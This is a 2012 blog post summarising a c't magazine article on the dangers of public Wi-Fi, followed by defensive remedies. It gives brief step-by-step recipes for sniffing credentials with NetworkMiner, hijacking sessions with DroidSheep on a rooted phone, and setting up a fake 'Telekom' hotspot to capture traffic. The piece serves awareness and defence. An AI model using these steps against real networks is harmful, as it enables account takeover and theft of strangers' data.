WLAN Security - Beware of (Unknown) Wi-Fi Hotspots

  • Security
  • Published Jan 3, 2012 Updated Jan 2, 2012

In its issue 1/2012 German c’t magazine published an article about security in Wi-Fi networks. The authors describe how very easy it is to gain access to other people’s accounts and passwords in a world where travelers happily connect to any wireless network they can get hold of. This is a short summary of the original article, intended to highlight the dangers.

The attacks described here are made possible by the following:

  • For reasons of ease of use, public Wi-Fi networks often do not use encryption, e.g. WPA2. Data is literally flowing through the air completely unprotected.
  • Even in encrypted networks communication between individual computers is often not disabled, making ARP spoofing attacks possible.
  • The WLAN standards do not include any functionality to authenticate an access point. Wireless networks are identified by name only which makes it trivial to set up a fake “Telekom” network, for example.

Attack #1: Information Sniffing

NetworkMiner uses the capture driver WinPcap (known from Wireshark) to extract data from a (wireless) network. It fully automatically stores all images, other files, cookies, usernames and passwords:

NetworkMiner

Setting up this attack is more than trivial: download and install WinPcap and NetworkMiner. Join any public wireless network. Run NetworkMiner and wait.

Attack #2: Account Hijacking

DroidSheep works similarly to Firesheep but runs inconspicuously on a smartphone. It captures session cookies from most sites and injects them in the attacker’s browser, making identity theft a matter of a single tap on a touchscreen.

Setting up this attack is easy: root your Android phone, install DroidSheep, join any public wireless network and run DroidSheep. As soon as another user on the network accesses a website requiring authentication, you are “in”. You can use that site with the other guy’s account, read messages, post status updates or steal the account by changing e-mail address and password.

Attack #3: Honeypot

An even easier way for capturing other people’s data than connecting to the Wi-Fi they use is to make them connect to you. To set this up, enable the mobile hotspot functionality of your Android phone and choose a name used by a popular hotspot provider. In Germany that could be “Telekom”. Then install a network packet capturing tool like “Shark for Root” which is tcpdump with a simple UI. That is all.

Other smartphones which have connected to the network called “Telekom” in the past will connect to your access point automatically. All internet traffic of those devices will be routed through your phone. Unencrypted data can easily be extracted from the captured traffic afterwards.

Remedy

Unfortunately, there is no real remedy as long as the WLAN standards lack significant security features like access point authentication. Here is what you can do today:

  • Use UMTS (3G) instead of Wi-Fi.
  • Only use known secure Wi-Fi networks, e.g. at home and at work.
  • If you operate a Wi-Fi network, prohibit communication between endpoints.
  • Create a guest Wi-Fi network which is separated from the internal production network.
  • Use SSL/TLS encryption wherever possible. Unfortunately, many websites switch to unencrypted HTTP after the login making account hijacking by cookie theft trivial. Even worse, with smartphone apps there is practically no way to determine whether they communicate securely or not.

c’t explicitly does not recommend to use a VPN with a smartphone because the combination simply is not safe: after a temporary connectivity loss the internet connection via WLAN or 3G is restored automatically, but the VPN connection is not.

Account HijackingDroidSheepHotspotNetworkNetworkMinerSecuritySniffingWi-FiWLAN

Comments

Related Posts

Taking Ownership Fails With UNC Path, Works Locally!?! Why?

Here is an interesting tidbit related to Windows security: Create a test file share, e.g. C:\temp\test, and share it with full permissions for everyone (share, not NTFS permissions) as “test” Create the following directory hierarchy below the share: C:\temp\test\1\2\3\4 Assign ownership of the four folders 1, 2, 3 and 4 to any user (but do not use your own account, just anyone else’s) Set permissions on 1, 2, 3 and 4 that only the user from the previous step has full access, nobody else, not even the SYSTEM Now try to use SetACL to change the owner of directory “4” over the network (SetACL uses backup and restore privileges so this should be no problem) by issuing the following command locally: setacl -on \localhost\test\1\2\3\4 -ot file -actn setowner -ownr n:domain\administrator SetACL will fail with access denied (full message: “ERROR: Writing SD to <\?\UNC\localhost\test\1\2\3\4> failed with: Access is denied.”) Now issue the same command, but instead of using a UNC path use the local drive letter: setacl -on c:\temp\test\1\2\3\4 -ot file -actn setowner -ownr n:domain\administrator That works! Why is this so? I have no clue.
Security

Latest Posts

Fast & Silent 5 Watt PC: Minimizing Idle Power Usage

Fast & Silent 5 Watt PC: Minimizing Idle Power Usage
This micro-series explains how to turn the Lenovo ThinkCentre M90t Gen 6 into a smart workstation that consumes only 5 Watts when idle but reaches top Cinebench scores while staying almost imperceptibly silent. In the first post, I showed how to silence the machine by replacing and adding to Lenovo’s CPU cooler. In this second post, I’m listing the exact configuration that achieves the lofty goal of combining minimal idle power consumption with top Cinebench scores.
Hardware

Fast & Silent 5 Watt PC: Lenovo ThinkCentre M90t Modding

Fast & Silent 5 Watt PC: Lenovo ThinkCentre M90t Modding
This micro-series explains how to turn the Lenovo ThinkCentre M90t Gen 6 into a smart workstation that consumes only 5 Watts when idle but reaches top Cinebench scores while staying almost imperceptibly silent. In this first post, I’m showing how to silence the machine by replacing and adding to Lenovo’s CPU cooler. In a second post, I’m listing the exact configuration that achieves the lofty goal of combining minimal idle power consumption with top Cinebench scores.
Hardware